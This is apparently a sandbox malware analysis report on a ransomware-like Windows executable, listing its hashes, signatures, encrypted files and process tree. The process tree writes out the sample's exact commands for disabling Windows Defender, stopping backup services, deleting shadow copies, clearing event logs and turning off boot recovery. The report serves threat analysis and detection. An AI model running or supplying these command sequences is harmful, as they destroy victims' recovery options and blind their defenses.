Resubmissions
  12-01-2022 20:48  220112-zlnz9adhf2  score 10
  12-01-2022 19:37  220112-yb5pksdgc6  score 10
  12-01-2022 19:25  220112-x5evksdgdl  score 10
  12-01-2022 16:50  220112-vb8jpadcc4  score 10
Analysis
  max time kernel: 44s
  max time network: 16s
  platform: windows7_x64
  resource: win7-en-20211208
  submitted: 12-01-2022 19:25
Static task: static1
Behavioral task: behavioral1
  Sample: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
  Resource: win10-en-20211208
General
  Target: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
  Size: 2.6MB
  MD5: 47f540350b1d360403225d146cc7fbb8
  SHA1: 43ad25b99cb47c7367b1703315402bb9e4970590
  SHA256: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
  SHA512: 91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2124)
Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe
  description: Set value (int)
  ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
  process: reg.exe
Clears Windows event logs (1 TTP)
Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 2060), bcdedit.exe (PID 2084)
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
  Processes: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
  description: File opened for modification (all 64 entries); process: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe (all 64 entries)
  ioc:
    C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_shAMFEMgwT80.8zvpm
    C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_oahjWh0W5XI0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_M8XkCRnD5WY0.8zvpm
    C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcer.dll.mui
    C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_g9rixWu2cG80.8zvpm
    C:\Program Files (x86)\Microsoft Office\Office14\1033\CollectSignatures_Init.xsn.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_KYVLwIVd6Kw0.8zvpm
    C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mdM9cGavobQ0.8zvpm
    C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_INkUS0-cPBY0.8zvpm
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_RfLNRchu-OI0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_SGT8URzAQBA0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_497_upyDxr80.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_yzv7fGQeusc0.8zvpm
    C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.ELM.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nJFdfIuywj40.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_sxbAxYEGbIk0.8zvpm
    C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\THMBNAIL.PNG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_gh7HKWwFaCc0.8zvpm
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00687_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_7nYtHetx2wE0.8zvpm
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_8cOWmM0P3fE0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_v-Dji1ArOpY0.8zvpm
    C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_6TOpSANo4tQ0.8zvpm
    C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_qxjzNKqX7eM0.8zvpm
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ggDLiAovPcM0.8zvpm
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_IGgRsQMT1b40.8zvpm
    C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png
    C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_s4ScfK4JFks0.8zvpm
    C:\Program Files\UnlockClose.wdp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_K-QvJQ8ZjFM0.8zvpm
    C:\Program Files\7-Zip\Lang\nl.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_A3dzxAxRhvc0.8zvpm
    C:\Program Files\Windows Media Player\Media Renderer\DMR_48.jpg
    C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif
    C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_mwdAM9IcPIA0.8zvpm
    C:\Program Files (x86)\Common Files\Services\verisign.bmp.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_nwBcysLdQJo0.8zvpm
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ldJSXuI5Szc0.8zvpm
    C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_C5Mmz3yuyNY0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-2pyxKznThM0.8zvpm
    C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html
    C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_wU5YPL8KIgU0.8zvpm
    C:\Program Files\Windows Media Player\de-DE\setup_wm.exe.mui
    C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png
    C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png
    C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_uwsrTcepxOs0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_m45q3VgObc80.8zvpm
    C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_3roULLG0Q-o0.8zvpm
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_Liwi_NnikTc0.8zvpm
    C:\Program Files\Common Files\Microsoft Shared\ink\hwresmlm.dat
    C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_fIVVazX-qVc0.8zvpm
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_hWR8tHXnklg0.8zvpm
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_vw1BQm7TVVA0.8zvpm
    C:\Program Files\7-Zip\Lang\en.ttt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_xhxn1-Xw-8k0.8zvpm
    C:\Program Files\7-Zip\Lang\th.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_okdJzt01E140.8zvpm
    C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png
    C:\Program Files\7-Zip\Lang\ro.txt.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_QSxGsNbzmGs0.8zvpm
    C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GEJMpGZaN-00.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_NwJQOh75ixA0.8zvpm
    C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_DijtvB6KpR80.8zvpm
    C:\Program Files\VideoLAN\VLC\lua\http\vlm.html.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_ORU5jAhnJRQ0.8zvpm
    C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_GPy6rxBomDk0.8zvpm
    C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui
    C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF.gDt3ZjpPXvDgOG-c_scLDfL1dJ2EGrHnXxROcUoPuaL_-wMe8YHV2fM0.8zvpm
Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 816)
Runs net.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2156), powershell.exe (PID 2248), cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe (PID 1928)
Suspicious use of AdjustPrivilegeToken (28 IoCs)
  Processes: wevtutil.exe (x3), wmic.exe, powershell.exe (x2)
  description / pid / process:
    Token: SeSecurityPrivilege       2000  wevtutil.exe
    Token: SeBackupPrivilege         2000  wevtutil.exe
    Token: SeSecurityPrivilege       1948  wevtutil.exe
    Token: SeBackupPrivilege         1948  wevtutil.exe
    Token: SeSecurityPrivilege       524   wevtutil.exe
    Token: SeBackupPrivilege         524   wevtutil.exe
    Token: SeIncreaseQuotaPrivilege  832   wmic.exe
    Token: SeSecurityPrivilege       832   wmic.exe
    Token: SeTakeOwnershipPrivilege  832   wmic.exe
    Token: SeLoadDriverPrivilege     832   wmic.exe
    Token: SeSystemProfilePrivilege  832   wmic.exe
    Token: SeSystemtimePrivilege     832   wmic.exe
    Token: SeProfSingleProcessPrivilege  832  wmic.exe
    Token: SeIncBasePriorityPrivilege    832  wmic.exe
    Token: SeCreatePagefilePrivilege     832  wmic.exe
    Token: SeBackupPrivilege         832   wmic.exe
    Token: SeRestorePrivilege        832   wmic.exe
    Token: SeShutdownPrivilege       832   wmic.exe
    Token: SeDebugPrivilege          832   wmic.exe
    Token: SeSystemEnvironmentPrivilege  832  wmic.exe
    Token: SeRemoteShutdownPrivilege     832  wmic.exe
    Token: SeUndockPrivilege         832   wmic.exe
    Token: SeManageVolumePrivilege   832   wmic.exe
    Token: 33                        832   wmic.exe
    Token: 34                        832   wmic.exe
    Token: 35                        832   wmic.exe
    Token: SeDebugPrivilege          2156  powershell.exe
    Token: SeDebugPrivilege          2248  powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe, net.exe (x8)
  description (pid -> target pid, process -> target process); "x3" means the source lists the same write three times:
    PID 1928 wrote to memory of 1984  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 1984 wrote to memory of 524   net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 472   cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 472 wrote to memory of 1416   net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 1464  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 1464 wrote to memory of 1396  net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 540   cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 540 wrote to memory of 1752   net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 1508  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 1508 wrote to memory of 620   net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 2028  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 2028 wrote to memory of 2044  net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 1048  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 1048 wrote to memory of 1968  net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 1084  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> net.exe   x3
    PID 1084 wrote to memory of 736   net.exe -> net1.exe   x3
    PID 1928 wrote to memory of 964   cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> sc.exe   x3
    PID 1928 wrote to memory of 1196  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> sc.exe   x3
    PID 1928 wrote to memory of 1900  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> sc.exe   x3
    PID 1928 wrote to memory of 1712  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> sc.exe   x3
    PID 1928 wrote to memory of 1020  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> sc.exe   x3
    PID 1928 wrote to memory of 1924  cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -> sc.exe   x1
Processes
([n] is the depth in the process tree; "cmd" is the command line; "sig" lists the signatures triggered by that process)
[1] PID 1928  C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"
    sig: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  [2] PID 1984  C:\Windows\system32\net.exe
      cmd: net.exe stop "NetMsmqActivator" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 524  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  [2] PID 472  C:\Windows\system32\net.exe
      cmd: net.exe stop "SamSs" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 1416  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
  [2] PID 1464  C:\Windows\system32\net.exe
      cmd: net.exe stop "SDRSVC" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 1396  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] PID 540  C:\Windows\system32\net.exe
      cmd: net.exe stop "SstpSvc" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 1752  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] PID 1508  C:\Windows\system32\net.exe
      cmd: net.exe stop "UI0Detect" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 620  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] PID 2028  C:\Windows\system32\net.exe
      cmd: net.exe stop "VSS" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 2044  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "VSS" /y
  [2] PID 1048  C:\Windows\system32\net.exe
      cmd: net.exe stop "wbengine" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 1968  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
  [2] PID 1084  C:\Windows\system32\net.exe
      cmd: net.exe stop "WebClient" /y
      sig: Suspicious use of WriteProcessMemory
    [3] PID 736  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
  [2] PID 964  C:\Windows\system32\sc.exe
      cmd: sc.exe config "NetMsmqActivator" start= disabled
  [2] PID 1196  C:\Windows\system32\sc.exe
      cmd: sc.exe config "SamSs" start= disabled
  [2] PID 1900  C:\Windows\system32\sc.exe
      cmd: sc.exe config "SDRSVC" start= disabled
  [2] PID 1712  C:\Windows\system32\sc.exe
      cmd: sc.exe config "SstpSvc" start= disabled
  [2] PID 1020  C:\Windows\system32\sc.exe
      cmd: sc.exe config "UI0Detect" start= disabled
  [2] PID 1924  C:\Windows\system32\sc.exe
      cmd: sc.exe config "VSS" start= disabled
  [2] PID 1704  C:\Windows\system32\sc.exe
      cmd: sc.exe config "wbengine" start= disabled
  [2] PID 1600  C:\Windows\system32\sc.exe
      cmd: sc.exe config "WebClient" start= disabled
  [2] PID 376  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 108  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] PID 516  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] PID 1632  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] PID 1764  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] PID 620  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 2032  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] PID 1852  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] PID 1120  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 1548  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] PID 2012  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] PID 1736  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] PID 556  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] PID 888  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] PID 1976  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 1684  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 792  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] PID 1404  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] PID 1992  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] PID 1052  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] PID 1624  C:\Windows\system32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] PID 1176  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] PID 1688  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] PID 1188  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] PID 1660  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 968  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1416  C:\Windows\system32\reg.exe
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1104  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 436  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1540  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 676  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1748  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      sig: Modifies security service
  [2] PID 1696  C:\Windows\system32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 816  C:\Windows\system32\vssadmin.exe
      cmd: vssadmin.exe delete shadows /all /quiet
      sig: Interacts with shadow copies
  [2] PID 2000  C:\Windows\system32\wevtutil.exe
      cmd: wevtutil.exe cl system
      sig: Suspicious use of AdjustPrivilegeToken
  [2] PID 1948  C:\Windows\system32\wevtutil.exe
      cmd: wevtutil.exe cl security
      sig: Suspicious use of AdjustPrivilegeToken
  [2] PID 524  C:\Windows\system32\wevtutil.exe
      cmd: wevtutil.exe cl application
      sig: Suspicious use of AdjustPrivilegeToken
  [2] PID 832  C:\Windows\System32\Wbem\wmic.exe
      cmd: wmic.exe SHADOWCOPY /nointeractive
      sig: Suspicious use of AdjustPrivilegeToken
  [2] PID 1616  C:\Windows\System32\Wbem\wmic.exe
      cmd: wmic.exe shadowcopy delete
  [2] PID 2060  C:\Windows\system32\bcdedit.exe
      cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      sig: Modifies boot configuration data using bcdedit
  [2] PID 2084  C:\Windows\system32\bcdedit.exe
      cmd: bcdedit.exe /set {default} recoveryenabled no
      sig: Modifies boot configuration data using bcdedit
  [2] PID 2104  C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [3] PID 2124  C:\Program Files\Windows Defender\MpCmdRun.exe
        cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        sig: Deletes Windows Defender Definitions
  [2] PID 2136  C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [3] PID 2156  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell Set-MpPreference -DisableIOAVProtection $true
        sig: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  [2] PID 2228  C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [3] PID 2248  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
